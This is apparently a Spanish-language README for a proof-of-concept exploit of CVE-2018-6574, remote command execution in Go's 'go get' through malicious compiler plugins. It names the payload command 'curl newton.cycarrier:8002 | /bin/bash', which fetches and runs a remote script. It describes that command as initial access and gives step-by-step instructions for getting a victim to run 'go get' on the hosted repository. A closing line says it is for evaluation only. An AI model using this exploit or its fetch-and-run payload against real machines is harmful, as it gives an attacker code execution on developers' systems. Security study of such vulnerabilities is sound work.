
Exploit de prueba de concepto para CVE-2018-6574, que demuestra la ejecución remota de comandos en el comando go get de Go mediante plugins de compilador maliciosos durante la compilación de código fuente.
Go anterior a 1.8.7, Go 1.9.x anterior a 1.9.4 y Go 1.10 pre-lanzamientos anteriores a Go 1.10rc2 permiten la ejecución remota de comandos mediante go get durante la compilación del código fuente, aprovechando la característica de plugins de gcc o clang, porque los argumentos -fplugin= y -plugin= no estaban bloqueados. (de mitre)
El comando fue compilado en la biblioteca dinámica calc_darwin.so. Y el comando actual es curl newton.cycarrier:8002 | /bin/bash. Se utilizó como acceso inicial de un programa. Debes alojar un servidor de archivos en el puerto 8002 y vincular el host a tu IP.
Primero, debes instalar la versión requerida de golang en la víctima. Luego, aloja este repositorio en un servidor git accesible. Finalmente, utiliza el comando go get para obtener este repositorio, y el comando se ejecutará automáticamente.
Toma mi repositorio como ejemplo. Debes usar el siguiente comando:
go get github.com/frozenkp/CVE-2018-6574
Este repositorio es solo para fines de evaluación.